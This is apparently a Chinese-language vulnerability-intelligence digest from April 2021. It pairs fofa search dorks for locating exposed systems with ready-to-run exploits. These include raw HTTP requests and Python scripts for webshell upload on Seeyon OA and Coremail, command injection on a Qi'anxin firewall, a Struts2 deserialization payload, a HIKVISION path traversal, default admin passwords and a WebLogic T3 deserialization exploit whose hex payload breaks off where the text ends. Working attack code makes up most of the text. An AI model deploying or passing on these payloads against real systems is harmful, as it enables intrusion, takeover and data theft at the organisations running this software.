0x21 金山终端安全系统 V8/V9存在文件上传漏洞

漏洞关注点

dzz/shares/index.php

0x22 齐治堡垒机某版本任意用户登录

漏洞关注点

/audit/gui_detail_view.php

Fofa

app="齐治科技-堡垒机"

POC

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

0x23 Coremail 邮件系统任意文件上传漏洞【历史漏洞】

漏洞危害:

其特定版本范围内存在任意文件上传漏洞,攻击者可以上传webshell,从而造成远程代码执行。

影响范围

Coremail <= XT5.x

漏洞复现:

使用网上流传POC 进行验证 https://github.com/xiaoshu-bit/CoreMailUploadRce

pip3 install -r requirements.txt
python3 coremail_upload.py -u http://127.0.0.1:1111

文件上传poc:

POST /webinst/action.jsp HTTP/1.1
Host: 120.136.129.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Connection: close

func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20JUSTTEST

上传文位置: http://ip:port/coremail/justtest.jsp

0x24 Apache Struts2补丁绕过0day(实际为S2-052)【无POC】

影响版本

2.1.1到2.3.x之前的2.3.x和2.5.13之前的2.5.x

漏洞关注点:

com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource

原exp

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>calc.exe</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

0x25 其他信息

4月10日9时,网爆OneBl**小于等于v2.2.1远程命令执行,poc已流出
CVE-2021-24086,Windows TCP/IP拒绝服务漏洞POC已公开

Chrome 命令执行(需要关闭Google沙箱,不排除存在绕过沙箱的可能) //https://www.cnblogs.com/KHZ521/p/14654233.html

4月11-4月12安全情报

0x26 浪潮 ClusterEngineV4.0 任意命令执行

漏洞关注点

/alarmConfig

fofa_dork

title="TSCEV4.0"

POC

地址 : https://github.com/xiaoshu-bit/ClusterEngineRce

pip3 install -r requirements.txt
python3 clusterengine_poc.py -u http://127.0.0.1:1111
def verify(self, first=False):
        target = self.scan_info['Target']
        verbose = self.scan_info['Verbose']
        headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }
        payload = "op=login&username=asd&password=asd'"
        try:
            url = urljoin(target, '/login')
            resp = req(url, 'post', data=payload,headers=headers,verify=False)
            if ('{"err"' in resp.text) and (" syntax error: unexpected end of file" in resp.text):
                log.highlight("found Inspur ClusterEngine v4.0 Remote Code Execution")
                self.scan_info['Success'] = True
                self.scan_info['Ret']['VerifyInfo']['URL'] = url
                self.scan_info['Ret']['VerifyInfo']['Payload'] = payload
                self.scan_info['Ret']['VerifyInfo']['method'] = "POST"
                return
        except Exception as e:
            log.info("[*]Request to target URL fail! {}".format(e))

0x27 志远OA session泄露&&任意文件上传漏洞

漏洞描述

致远OA通过发送特殊请求获取session,在通过文件上传接口上传webshell控制服务器

fofa

title="致远"

漏洞复现

首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 133
Content-Type: application/x-www-form-urlencoded

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

上传压缩包

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"
true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"
resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"
false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.png"
Content-Type: image/png
111
--59229605f98b8cf290a7b8908b34616b--

然后解压

POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.10.2
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=BDF7358D4C35C6D2BB99FADFEE21F913
Content-Length: 157

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%222021-04-09%22%2C%225818374431215601542%22%5D

getshell 脚本

# coding: utf-8
import requests
import re
import time
proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}
def seeyon_new_rce(targeturl):
    orgurl = targeturl
    # 通过请求直接获取管理员权限cookie
    targeturl = orgurl + 'seeyon/thirdpartyController.do'
    post={"method":"access","enc":"TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4","clientPath":"127.0.0.1"}
    response = requests.post(url=targeturl,data=post,proxies=proxy, timeout=60,verify=False)
    rsp = ""
    if response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower():
        cookies = response.cookies
        cookies = requests.utils.dict_from_cookiejar(cookies)
        # 上传压缩文件
        aaa=cookies['JSESSIONID']
        print(aaa)
        targeturl = orgurl + 'seeyon/fileUpload.do?method=processUpload'
        files = [('file1', ('11.png', open('1.zip', 'r'), 'image/png'))]
        print()
        headers = {'Cookie':"JSESSIONID=%s"%aaa}
        data = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver':"false", "type": '0',
                'isEncrypt': "0"}
        response = requests.post(url=targeturl,files=files,data=data, headers=headers,proxies=proxy,timeout=60,verify=False)
        if response.text:
            reg = re.findall('fileurls=fileurls\+","\+\'(.+)\'',response.text,re.I)
            print(reg)
            if len(reg)==0:
                exit("匹配失败")
            fileid=reg[0]
            targeturl = orgurl + 'seeyon/ajax.do'
            datestr = time.strftime('%Y-%m-%d')
            post = 'method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=%5B0%2C%22' + datestr + '%22%2C%22' + fileid + '%22%5D'
            #headers = {'Cookie': cookies}
            headers['Content-Type']="application/x-www-form-urlencoded"
            response = requests.post(targeturl, data=post,headers=headers,proxies=proxy,timeout=60,verify=False)
            print(response.text)
seeyon_new_rce("https://baidu.com/")

shell地址:/seeyon/common/designer/pageLayout/a2345678.jsp

0x28 奇安信 网康下一代防火墙RCE

漏洞位置

/directdata/direct/router

POC

POST /directdata/direct/router HTTP/1.1
Host: 192.168.10.6
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=q885n85a5es9i83d26rm102sk3; ys-active_page=s%3A
Content-Type: application/x-www-form-urlencoded
Content-Length: 160

{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;whoami>/var/www/html/1.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}

0x29 其他信息

4月12日14时 最新发现天擎终端安全管理系统控制台存在远程命令执行漏洞,poc疑似已流出
4月12日12时 最新发现讯雷11存在二进制漏洞
4月12日12时 传出PHP zerodiMQ后门漏洞,poc已流出
4月12日10时 传出fastjson 1.2.75  绕过RCE漏洞,poc疑似已流出

4月13号-4月21号

fofa

app="D_Link-DCS-2530L"

POC

/config/getuser?index=0

0x31 HIKVISION 流媒体管理服务器 后台任意读取

Fofa

title="流媒体管理服务器"

POC

http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini

0x32 HIKVISION 流媒体管理服务器 存在默认口令

POC

admin/12345

0x33 Kyan 网络监控设备 账号密码泄露漏洞

fofa

title="platform - Login"

POC

http://xx.xx.xx.xx/host

0x34 Wayos AC集中管理系统默认口令

Fofa

title="AC集中管理系统"

POC

admin/admin

0x35 WordPress 插件SuperForms任意上传

影响版本

<= 4.9.X

POC

# Exploit Title: WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code Execution
# Exploit Author: ABDO10
# Date : Jan - 28 - 2021
# Google Dork : inurl:"/wp-content/plugins/super-forms/"
# Vendor Homepage : https://renstillmann.github.io/super-forms/#/
# Version : All (<= 4.9.X)
# data in http request :

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1
 <=== exploit end point
Host: localhost
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: localhost
Connection: close
Referer: localhost
Cookie: 

-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF                        <=======
inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"

8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"

0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]";
filename="filename.(extension)"    <====   inject code extension (.php4)
for example
Content-Type: application/pdf

Evil codes to be uploaded

-----------------------------423513681827540048931513055996--

# Uploaded Malicious File can  be Found in :
/wp-content/uploads/superforms/2021/01/<id>/filename.php4
u can get <id> from server reply .

0x36 Zyxel NBG2105身份验证绕过

POC & EXP

# python3
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning


def poc(url):
    exp = url + "/login_ok.htm"

    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "cookie":"login=1",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=exp, headers=header, verify=False,timeout=10)
        #print(response.text)
        if response.status_code == 200 and "GMT" in response.text:
            print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
            print("数据信息如下:")
            print(response.text)
        else:
            print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
    except Exception as e:
        print(exp + "请求失败!!")


def main():
    url = str(input("请输入目标url:"))
    poc(url)


if __name__ == "__main__":
    main()

0x37 weblogic的T3反序列化RCE

POC

#!/usr/bin/python2
import socket
import os
import sys
import struct
import time
if len(sys.argv) < 2:
    print 'Usage: python %s <TARGET_HOST> <PORT>' % os.path.basename(sys.argv[0])
    sys.exit()
 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
 
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)
 
# Send headers
headers='t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://abcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmnabcdefghijklmn:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)
 
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
 
payloadObj='\xac\xed\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4c\x69\x6e\x6b\x65\x64\x48\x61\x73\x68\x53\x65\x74\xd8\x6c\xd7\x5a\x95\xdd\x2a\x1e\x02\x00\x00\x78\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00\x78\x70\x77\x0c\x00\x00\x00\x10\x3f\x40\x00\x00\x00\x00\x00\x02\x73\x72\x00\x19\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x4f\x62\x6a\x65\x63\x74\x7c\xbd\x1e\x97\xed\x63\xfc\x3e\x02\x00\x03\x49\x00\x04\x68\x61\x73\x68\x5b\x00\x08\x6c\x6f\x63\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x5b\x00\x08\x6f\x62\x6a\x42\x79\x74\x65\x73\x71\x00\x7e\x00\x04\x78\x70\xea\x0c\xa3\xad\x70\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x10\xea\xac\xed\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4c\x69\x6e\x6b\x65\x64\x48\x61\x73\x68\x53\x65\x74\xd8\x6c\xd7\x5a\x95\xdd\x2a\x1e\x02\x00\x00\x78\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00\x78\x70\x77\x0c\x00\x00\x00\x10\x3f\x40\x00\x00\x00\x00\x00\x02\x73\x72\x00\x3a\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac\xab\x33\x03\x00\x08\x49\x00\x0d\x5f\x69\x6e\x64\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64\x65\x78\x5a\x00\x15\x5f\x75\x73\x65\x53\x65\x72\x76\x69\x63\x65\x73\x4d\x65\x63\x68\x61\x6e\x69\x73\x6d\x4c\x00\x0b\x5f\x61\x75\x78\x43\x6c\x61\x73\x73\x65\x73\x74\x00\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x48\x61\x73\x68\x74\x61\x62\x6c\x65\x3b\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff\xff\xff\xff\x00\x70\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00\x00\x00\x01\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x0d\x7a\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\xac\x0a\x00\x26\x00\x5a\x0a\x00\x5b\x00\x5c\x0a\x00\x5b\x00\x5d\x08\x00\x5e\x0a\x00\x5f\x00\x60\x08\x00\x61\x07\x00\x62\x0a\x00\x07\x00\x63\x07\x00\x64\x0a\x00\x65\x00\x66\x09\x00\x67\x00\x68\x0a\x00\x69\x00\x6a\x08\x00\x6b\x07\x00\x4d\x0a\x00\x09\x00\x6c\x08\x00\x6d\x0a\x00\x07\x00\x6e\x0a\x00\x6f\x00\x70\x0a\x00\x6f\x00\x71\x0a\x00\x07\x00\x72\x08\x00\x73\x07\x00\x74\x0a\x00\x16\x00\x75\x08\x00\x76\x07\x00\x3d\x08\x00\x77\x07\x00\x78\x08\x00\x79\x0a\x00\x7a\x00\x7b\x0a\x00\x1b\x00\x7c\x0a\x00\x1b\x00\x7d\x08\x00\x7e\x0a\x00\x69\x00\x7f\x0a\x00\x25\x00\x80\x07\x00\x81\x0a\x00\x23\x00\x82\x07\x00\x83\x07\x00\x84\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x4c\x73\x75\x70\x65\x72\x6d\x61\x6e\x2f\x45\x63\x68\x6f\x54\x65\x73\x74\x3b\x01\x00\x09\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x07\x00\x85\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\x04\x65\x63\x68\x6f\x01\x00\x03\x62\x75\x66\x01\x00\x02\x5b\x42\x01\x00\x03\x6f\x75\x74\x01\x00\x16\x4c\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x3b\x01\x00\x01\x73\x01\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x01\x00\x01\x66\x01\x00\x19\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x46\x69\x65\x6c\x64\x3b\x01\x00\x01\x6f\x01\x00\x03\x6c\x65\x6e\x01\x00\x04\x6c\x65\x6e\x31\x01\x00\x01\x49\x01\x00\x04\x76\x61\x72\x34\x01\x00\x03\x63\x6c\x73\x01\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x01\x00\x03\x6e\x69\x6f\x01\x00\x02\x73\x73\x01\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x01\x00\x04\x76\x61\x72\x36\x01\x00\x04\x76\x61\x72\x35\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65\x07\x00\x62\x07\x00\x64\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x01\x00\x04\x76\x61\x72\x33\x01\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x01\x00\x04\x76\x61\x72\x32\x07\x00\x81\x01\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x22\x45\x63\x68\x6f\x54\x65\x73\x74\x2e\x6a\x61\x76\x61\x20\x66\x72\x6f\x6d\x20\x49\x6e\x70\x75\x74\x46\x69\x6c\x65\x4f\x62\x6a\x65\x63\x74\x0c\x00\x27\x00\x28\x07\x00\x86\x0c\x00\x87\x00\x88\x0c\x00\x89\x00\x8a\x01\x00\x1b\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x53\x6f\x63\x6b\x65\x74\x4d\x75\x78\x65\x72\x07\x00\x8b\x0c\x00\x8c\x00\x8d\x01\x00\x08\x67\x65\x74\x4d\x75\x78\x65\x72\x01\x00\x0f\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x0c\x00\x8e\x00\x8f\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x07\x00\x90\x0c\x00\x91\x00\x92\x07\x00\x93\x0c\x00\x3e\x00\x94\x07\x00\x95\x0c\x00\x96\x00\x97\x01\x00\x0a\x67\x65\x74\x53\x6f\x63\x6b\x65\x74\x73\x0c\x00\x98\x00\x99\x01\x00\x0a\x63\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x0c\x00\x9a\x00\x9b\x07\x00\x9c\x0c\x00\x9d\x00\x9e\x0c\x00\x9f\x00\xa0\x0c\x00\xa1\x00\x99\x01\x00\x12\x72\x65\x6d\x6f\x74\x65\x48\x65\x61\x64\x65\x72\x4c\x65\x6e\x67\x74\x68\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x49\x6e\x74\x65\x67\x65\x72\x0c\x00\xa2\x00\xa3\x01\x00\x09\x67\x65\x74\x42\x75\x66\x66\x65\x72\x01\x00\x0f\x67\x65\x74\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x4f\x75\x74\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x01\x00\x13\x76\x75\x6c\x6e\x65\x72\x61\x62\x69\x6c\x69\x74\x79\x20\x65\x78\x69\x73\x74\x07\x00\xa4\x0c\x00\xa5\x00\xa6\x0c\x00\xa7\x00\xa8\x0c\x00\xa9\x00\x28\x01\x00\x07\x6f\x6e\x20\x65\x63\x68\x6f\x0c\x00\x96\x00\xaa\x0c\x00\x3b\x00\x28\x01\x00\x13\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x0c\x00\xab\x00\x28\x01\x00\x11\x73\x75\x70\x65\x72\x6d\x61\x6e\x2f\x45\x63\x68\x6f\x54\x65\x73\x74\x01\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6e\x73\x6c\x65\x74\x01\x00\x39\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x54\x68\x72\x65\x61\x64\x01\